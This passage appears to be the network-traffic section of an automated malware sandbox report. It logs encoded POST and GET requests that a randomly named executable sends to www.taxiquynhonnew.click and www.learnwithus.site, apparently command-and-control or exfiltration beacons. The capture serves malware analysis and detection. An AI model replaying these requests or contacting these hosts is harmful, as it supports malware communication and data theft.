                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1055 Build/LPA23.12-21-1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                  Data Raw: 38 34 45 68 56 44 59 3d 72 34 72 4b 63 69 62 56 53 78 34 76 54 67 42 5a 4e 7a 70 61 4b 49 4c 73 56 68 4e 47 72 4d 2b 4b 2f 50 4c 7a 76 71 49 4e 41 78 30 75 4f 5a 69 34 4e 45 44 68 48 33 70 6e 6e 71 33 57 69 76 54 36 49 4d 30 6b 56 45 77 39 72 68 39 34 63 74 31 7a 56 53 72 69 65 33 2b 45 71 56 4f 2b 38 4f 55 63 32 63 69 75 58 72 4a 34 61 52 2f 59 77 62 34 49 78 59 39 2b 4d 4f 32 72 51 43 71 55 62 42 74 63 64 76 33 30 38 55 7a 68 55 54 2b 56 36 4d 77 37 65 70 49 62 7a 30 79 32 39 48 76 74 49 66 38 2f 6f 33 53 72 31 36 54 43 57 53 39 56 47 55 46 34 37 63 62 39 69 4f 49 45 51 49 4a 55 32 69 68 69 32 57 68 49 65 75 31 63 38 57 70 59 52 4b 39 47 6c 78 76 55 70 2b 30 4a 56 41 57 66
                                                                  Data Ascii: 84EhVDY=r4rKcibVSx4vTgBZNzpaKILsVhNGrM+K/PLzvqINAx0uOZi4NEDhH3pnnq3WivT6IM0kVEw9rh94ct1zVSrie3+EqVO+8OUc2ciuXrJ4aR/Ywb4IxY9+MO2rQCqUbBtcdv308UzhUT+V6Mw7epIbz0y29HvtIf8/o3Sr16TCWS9VGUF47cb9iOIEQIJU2ihi2WhIeu1c8WpYRK9GlxvUp+0JVAWf
                                                                  Dec 12, 2024 21:38:47.046320915 CET371INHTTP/1.1 301 Moved Permanently
                                                                  Server: openresty
                                                                  Date: Thu, 12 Dec 2024 20:38:46 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 166
                                                                  Connection: close
                                                                  Location: https://www.taxiquynhonnew.click/y49d/
                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                  Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  7192.168.2.84972118.139.62.226805240C:\Program Files (x86)\mFcuZnbhgXdemrXcBnUPFhsumXtyIJrpCtNGIfFsGFULpnbNNjwgjyZOXqPERImEnscPjlDbvuZ\PcwrDoOfOMD.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Dec 12, 2024 21:38:48.111126900 CET1874OUTPOST /y49d/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Host: www.taxiquynhonnew.click
                                                                  Origin: http://www.taxiquynhonnew.click
                                                                  Connection: close
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Content-Length: 1244
                                                                  Cache-Control: max-age=0
                                                                  Referer: http://www.taxiquynhonnew.click/y49d/
                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1055 Build/LPA23.12-21-1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                  Data Raw: 38 34 45 68 56 44 59 3d 72 34 72 4b 63 69 62 56 53 78 34 76 54 67 42 5a 4e 7a 70 61 4b 49 4c 73 56 68 4e 47 72 4d 2b 4b 2f 50 4c 7a 76 71 49 4e 41 78 4d 75 50 71 61 34 4f 6c 44 68 47 33 70 6e 37 61 33 62 69 76 53 36 49 4d 74 74 56 45 73 44 72 6b 35 34 65 4c 70 7a 51 6a 72 69 56 33 2b 45 6f 56 4f 2f 6a 65 56 59 32 59 4f 51 58 72 5a 34 61 52 2f 59 77 64 38 49 33 4e 4a 2b 4f 4f 32 71 64 53 71 49 66 42 73 42 64 76 76 4f 38 56 48 75 55 6a 65 56 39 74 41 37 54 2f 63 62 70 30 79 30 74 58 75 74 49 66 77 67 6f 32 2f 61 31 36 33 6f 57 51 74 56 47 54 70 6a 68 49 65 2b 78 64 6b 36 5a 2b 78 41 31 44 4a 63 2b 47 64 75 54 65 70 34 7a 78 51 31 51 61 30 4b 68 78 69 4c 71 61 6b 45 53 6b 7a 63 72 34 37 53 70 76 79 41 30 4a 45 6e 71 4e 2f 6a 78 47 66 73 41 35 58 39 38 5a 51 75 4e 72 6f 4f 76 6d 37 31 45 50 4e 55 43 77 52 34 71 63 4a 74 4a 30 2f 69 37 68 34 32 46 43 42 4e 74 7a 54 63 78 2f 58 77 70 70 79 52 76 4c 61 66 74 65 59 65 70 69 6a 50 65 68 36 39 53 66 75 36 6d 42 6e 37 43 34 70 58 73 54 79 74 50 4f 70 78 57 36 [TRUNCATED]
                                                                  Data Ascii: 84EhVDY=r4rKcibVSx4vTgBZNzpaKILsVhNGrM+K/PLzvqINAxMuPqa4OlDhG3pn7a3bivS6IMttVEsDrk54eLpzQjriV3+EoVO/jeVY2YOQXrZ4aR/Ywd8I3NJ+OO2qdSqIfBsBdvvO8VHuUjeV9tA7T/cbp0y0tXutIfwgo2/a163oWQtVGTpjhIe+xdk6Z+xA1DJc+GduTep4zxQ1Qa0KhxiLqakESkzcr47SpvyA0JEnqN/jxGfsA5X98ZQuNroOvm71EPNUCwR4qcJtJ0/i7h42FCBNtzTcx/XwppyRvLafteYepijPeh69Sfu6mBn7C4pXsTytPOpxW6Jzog6zWptYDL6Bet4o4SVbmbjWnX2CTlHtQ0cFCwzG0/2OMg8MsyWFJ+mIQa3VWwWIJ2Yv1GqCI5IVm97A/MhT4G3CKPsSNpj0SSRXQHHOXhEsSRpEoLXVt2SDez3AZRG5xA64kfbllKGGAlO08cUlI9c2562D5DTO4S8ZgAq7J230W97W9IMZhAkbqefJIVlizSKvNV2lvgBg1LdZvTE13pY/lmZGLtLe8xhFavGVBRbp638IPZlPS5z+0PC348zbdMXPWizMU/d4hAygfVDbFQvDfJcxZl/TuvkYbgXrM1bdDfpfqpf1KnMTUT6S6xzGjBYjI1F+JHFrfD65495gik3nD+DmC2z8Z0Li04YH+CByY+LL6uMZZR7gkWlVOF4tF7GhiPLK5NvhMrpyxuPfjpL8/DZHAghO7k1PTxB7v/LvEiSyIArD/w/pqkLImYkmsZ3pMSf6qe7MDNJcziNFeo2FWgAyrCIJdnamL+gLeEYpYQgKXJlPZzHfwb/GrAUmSMbGmcDt/3frgReDGD+cqh8cMUPOlgETzjTfnb7qcz594R9Cz4kYreJrk6vGBTd9kHuv9uJMzeOuQ2TtmAP1fJkDymPB6RvfbN0B1HrFd5EiIDK9rxfnCzFp8LqhbOiL7x1GjOKMh2Q/PR/U/wyommgnw6GVh24j [TRUNCATED]
                                                                  Dec 12, 2024 21:38:49.687383890 CET371INHTTP/1.1 301 Moved Permanently
                                                                  Server: openresty
                                                                  Date: Thu, 12 Dec 2024 20:38:49 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 166
                                                                  Connection: close
                                                                  Location: https://www.taxiquynhonnew.click/y49d/
                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                  Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  8192.168.2.84972218.139.62.226805240C:\Program Files (x86)\mFcuZnbhgXdemrXcBnUPFhsumXtyIJrpCtNGIfFsGFULpnbNNjwgjyZOXqPERImEnscPjlDbvuZ\PcwrDoOfOMD.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Dec 12, 2024 21:38:50.776324034 CET569OUTGET /y49d/?84EhVDY=m6DqfWTYFUU8GAEJaQ04TZKKVQt9iuan9ImFwYYAXgcLCIKDKHWgUkMantPJ7uipU91pPV1usxBfeqldUzKMXj+Nm1qvgbEutIi/VJ05VR66+PohupJRL8TdRX6oU1EEMw==&Y6Bh=0jQHfl_Xbv0D_JU HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Host: www.taxiquynhonnew.click
                                                                  Connection: close
                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1055 Build/LPA23.12-21-1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                  Dec 12, 2024 21:38:52.356918097 CET533INHTTP/1.1 301 Moved Permanently
                                                                  Server: openresty
                                                                  Date: Thu, 12 Dec 2024 20:38:52 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 166
                                                                  Connection: close
                                                                  Location: https://www.taxiquynhonnew.click/y49d/?84EhVDY=m6DqfWTYFUU8GAEJaQ04TZKKVQt9iuan9ImFwYYAXgcLCIKDKHWgUkMantPJ7uipU91pPV1usxBfeqldUzKMXj+Nm1qvgbEutIi/VJ05VR66+PohupJRL8TdRX6oU1EEMw==&Y6Bh=0jQHfl_Xbv0D_JU
                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                  Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  9192.168.2.849723209.74.77.107805240C:\Program Files (x86)\mFcuZnbhgXdemrXcBnUPFhsumXtyIJrpCtNGIfFsGFULpnbNNjwgjyZOXqPERImEnscPjlDbvuZ\PcwrDoOfOMD.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Dec 12, 2024 21:39:06.182305098 CET825OUTPOST /a6qk/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Host: www.learnwithus.site
                                                                  Origin: http://www.learnwithus.site
                                                                  Connection: close
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Content-Length: 208
                                                                  Cache-Control: max-age=0
                                                                  Referer: http://www.learnwithus.site/a6qk/
                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1055 Build/LPA23.12-21-1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                  Data Raw: 38 34 45 68 56 44 59 3d 58 47 30 2b 61 72 68 6c 57 7a 44 6a 4d 68 48 2b 71 62 79 76 65 59 56 66 75 31 6d 4f 62 52 71 61 4c 66 30 63 6f 59 65 69 72 51 78 68 50 47 59 51 41 6e 35 36 70 2b 49 4a 53 55 5a 41 75 6a 30 61 77 49 6a 6d 4d 50 39 76 7a 46 30 52 48 6d 56 30 31 32 6a 77 64 64 77 37 65 49 2b 71 71 67 2b 47 57 70 55 77 62 39 37 36 76 64 4d 6f 48 2f 69 43 65 38 59 4b 4e 70 59 33 47 34 73 35 41 43 5a 64 45 67 2f 62 78 30 4a 35 6a 35 50 61 4c 58 62 6d 67 4f 59 63 50 4f 63 58 4e 44 69 34 51 38 4a 7a 78 30 41 39 69 47 43 65 47 66 2f 6c 73 61 34 4a 6a 49 2f 4d 2f 57 6c 30 57 69 34 53 6b 44 66 63 53 57 6b 47 49 6f 51 3d
                                                                  Data Ascii: 84EhVDY=XG0+arhlWzDjMhH+qbyveYVfu1mObRqaLf0coYeirQxhPGYQAn56p+IJSUZAuj0awIjmMP9vzF0RHmV012jwddw7eI+qqg+GWpUwb976vdMoH/iCe8YKNpY3G4s5ACZdEg/bx0J5j5PaLXbmgOYcPOcXNDi4Q8Jzx0A9iGCeGf/lsa4JjI/M/Wl0Wi4SkDfcSWkGIoQ=
                                                                  Dec 12, 2024 21:39:07.390558004 CET533INHTTP/1.1 404 Not Found
                                                                  Date: Thu, 12 Dec 2024 20:39:07 GMT
                                                                  Server: Apache
                                                                  Content-Length: 389
                                                                  Connection: close
                                                                  Content-Type: text/html
                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  10192.168.2.849724209.74.77.107805240C:\Program Files (x86)\mFcuZnbhgXdemrXcBnUPFhsumXtyIJrpCtNGIfFsGFULpnbNNjwgjyZOXqPERImEnscPjlDbvuZ\PcwrDoOfOMD.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Dec 12, 2024 21:39:08.845956087 CET845OUTPOST /a6qk/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Host: www.learnwithus.site
                                                                  Origin: http://www.learnwithus.site
                                                                  Connection: close
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Content-Length: 228
                                                                  Cache-Control: max-age=0
                                                                  Referer: http://www.learnwithus.site/a6qk/
                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1055 Build/LPA23.12-21-1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                  Data Raw: 38 34 45 68 56 44 59 3d 58 47 30 2b 61 72 68 6c 57 7a 44 6a 50 42 33 2b 6f 38 65 76 56 59 56 59 72 31 6d 4f 41 42 71 65 4c 66 34 63 6f 64 2b 79 72 69 56 68 50 6e 49 51 42 6d 35 36 6f 2b 49 4a 47 45 5a 46 68 44 30 76 77 49 6e 55 4d 4f 52 76 7a 45 51 52 48 6a 52 30 31 46 4c 7a 48 74 77 35 4c 59 2b 6b 75 67 2b 47 57 70 55 77 62 39 48 63 76 64 55 6f 48 50 79 43 64 64 59 46 45 4a 59 30 52 49 73 35 4c 69 59 61 45 67 2f 74 78 31 6c 44 6a 36 33 61 4c 57 72 6d 6c 50 59 66 46 4f 63 52 44 6a 6a 56 52 4f 6b 6d 7a 55 6f 74 6a 56 53 72 4e 2f 33 77 6b 4d 4a 6a 35 71 33 4b 38 57 4e 66 57 68 51 6b 68 30 43 30 49 31 30 32 57 2f 48 6e 2f 6d 59 6f 62 38 73 2f 46 43 4f 61 58 45 4f 56 56 4f 55 6a
                                                                  Data Ascii: 84EhVDY=XG0+arhlWzDjPB3+o8evVYVYr1mOABqeLf4cod+yriVhPnIQBm56o+IJGEZFhD0vwInUMORvzEQRHjR01FLzHtw5LY+kug+GWpUwb9HcvdUoHPyCddYFEJY0RIs5LiYaEg/tx1lDj63aLWrmlPYfFOcRDjjVROkmzUotjVSrN/3wkMJj5q3K8WNfWhQkh0C0I102W/Hn/mYob8s/FCOaXEOVVOUj
                                                                  Dec 12, 2024 21:39:10.051693916 CET533INHTTP/1.1 404 Not Found
                                                                  Date: Thu, 12 Dec 2024 20:39:09 GMT
                                                                  Server: Apache
                                                                  Content-Length: 389
                                                                  Connection: close
                                                                  Content-Type: text/html
                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  11192.168.2.849725209.74.77.107805240C:\Program Files (x86)\mFcuZnbhgXdemrXcBnUPFhsumXtyIJrpCtNGIfFsGFULpnbNNjwgjyZOXqPERImEnscPjlDbvuZ\PcwrDoOfOMD.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Dec 12, 2024 21:39:11.500159979 CET1862OUTPOST /a6qk/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Host: www.learnwithus.site
                                                                  Origin: http://www.learnwithus.site
                                                                  Connection: close
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Content-Length: 1244
                                                                  Cache-Control: max-age=0
                                                                  Referer: http://www.learnwithus.site/a6qk/
                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1055 Build/LPA23.12-21-1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                  Data Raw: 38 34 45 68 56 44 59 3d 58 47 30 2b 61 72 68 6c 57 7a 44 6a 50 42 33 2b 6f 38 65 76 56 59 56 59 72 31 6d 4f 41 42 71 65 4c 66 34 63 6f 64 2b 79 72 69 64 68 50 56 51 51 42 42 46 36 75 4f 49 4a 5a 30 5a 45 68 44 30 49 77 4d 4c 51 4d 4f 4e 56 7a 48 34 52 47 42 5a 30 7a 30 4c 7a 53 39 77 35 55 6f 2b 70 71 67 2f 43 57 70 6b 38 62 37 6e 63 76 64 55 6f 48 4e 61 43 4c 38 59 46 43 4a 59 33 47 34 73 50 41 43 5a 39 45 67 6e 54 78 31 52 54 67 4b 58 61 4c 32 37 6d 69 70 73 66 4a 4f 63 54 4f 44 6a 4e 52 4f 70 32 7a 55 6c 65 6a 57 50 77 4e 38 58 77 31 72 55 38 6d 4c 4f 53 72 77 6c 77 61 79 34 42 70 47 2b 2b 4b 45 6c 47 63 4e 54 37 72 32 59 58 59 4e 63 6f 4b 54 66 73 45 53 75 48 58 70 64 30 6d 50 45 4f 4f 64 69 2b 64 7a 6b 4a 6b 6c 54 73 66 4a 64 66 49 33 53 55 45 4b 32 73 45 37 72 71 4f 48 6b 45 6a 68 79 39 30 6c 35 54 32 2f 55 55 4d 68 36 47 54 35 55 53 65 31 51 4f 52 62 77 39 2f 4a 4f 46 35 32 36 39 62 4f 2b 62 7a 72 37 48 61 4f 65 44 44 78 56 56 6a 4b 69 6f 62 72 77 54 50 46 69 46 47 47 4c 41 65 6f 52 59 50 2b [TRUNCATED]
                                                                  Data Ascii: 84EhVDY=XG0+arhlWzDjPB3+o8evVYVYr1mOABqeLf4cod+yridhPVQQBBF6uOIJZ0ZEhD0IwMLQMONVzH4RGBZ0z0LzS9w5Uo+pqg/CWpk8b7ncvdUoHNaCL8YFCJY3G4sPACZ9EgnTx1RTgKXaL27mipsfJOcTODjNROp2zUlejWPwN8Xw1rU8mLOSrwlway4BpG++KElGcNT7r2YXYNcoKTfsESuHXpd0mPEOOdi+dzkJklTsfJdfI3SUEK2sE7rqOHkEjhy90l5T2/UUMh6GT5USe1QORbw9/JOF5269bO+bzr7HaOeDDxVVjKiobrwTPFiFGGLAeoRYP+nZ3rIV78UUQhnYSSpcSiRx5Ss8VuDGTsvYuySxKP28ECSQUZJaO/z/Ju0RSOkmWm7wGLZL5NW4q5Zn1Xh5SAG17zauR0YPFH05MgY1SP2pztGw2rDiVXRNg+vhPg8lFy5CpKJhziKpypDcG1nOnFJYPgPL3KkqLrCsrJHbjyp/Mq4/cKW6jCQEN/UOZ3aP2nZAlL7mpSOZEe9ORKNUU9jvnQ6XNQ5JYCI9qnOqdANthgTk/RBeC/NiNsag/h9tbU7+E+6Sj3ouxJJXyyCtmc7P5u0k1OfKZhuKe/PiK1ne7ESsB4IDHydM+keuyMECG4V+KL6YAvM+ceKaxHry8rE3WV3SWHHEYii3evHMLhFVSB9dB/K61OSGg9WwfcpGY0XHM6PGifbitevJ8IEtoY9spSXhqew4wohgVHcLXWpqqX6pDDGlQVMQrhU4SJgOZzHI+FNDMntHov1Q5zGbEgI4KjvdkjFvw/TDsmyUEB21PZv95cftqsNbyGojsy3DxWwtZSSrBthI9WFMwcFDep0u4iBls9UCjLLYnVaFZQLCP1Yw5saStCCyBv96dTwIoG3IKA7SEPufBNooa5dbow2C/4wnWxhjjVvaafqwHRhsGyVR6z3919V5Sx9uCpcFEXMSguErTuaKvbgj3CmekGr8rRCFtUGhVoxC [TRUNCATED]
                                                                  Dec 12, 2024 21:39:12.784013033 CET533INHTTP/1.1 404 Not Found
                                                                  Date: Thu, 12 Dec 2024 20:39:12 GMT
                                                                  Server: Apache
                                                                  Content-Length: 389
                                                                  Connection: close
                                                                  Content-Type: text/html
                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  12192.168.2.849726209.74.77.107805240C:\Program Files (x86)\mFcuZnbhgXdemrXcBnUPFhsumXtyIJrpCtNGIfFsGFULpnbNNjwgjyZOXqPERImEnscPjlDbvuZ\PcwrDoOfOMD.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Dec 12, 2024 21:39:14.150553942 CET565OUTGET /a6qk/?Y6Bh=0jQHfl_Xbv0D_JU&84EhVDY=aEceZcxMCBryYHP5wuuxALE/nyOJEnW8Dq1kpoaXpw1kPmwya2N1uoUJGmxyu00sisqpLeUFyGY8IB1P90PsS95xRIWFjwm0Cd59BaWixf9mBuP0aMIhNaQDKqAQJAIXVg== HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Host: www.learnwithus.site
                                                                  Connection: close
                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1055 Build/LPA23.12-21-1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                  Dec 12, 2024 21:39:15.387685061 CET548INHTTP/1.1 404 Not Found
                                                                  Date: Thu, 12 Dec 2024 20:39:15 GMT
                                                                  Server: Apache
                                                                  Content-Length: 389
                                                                  Connection: close
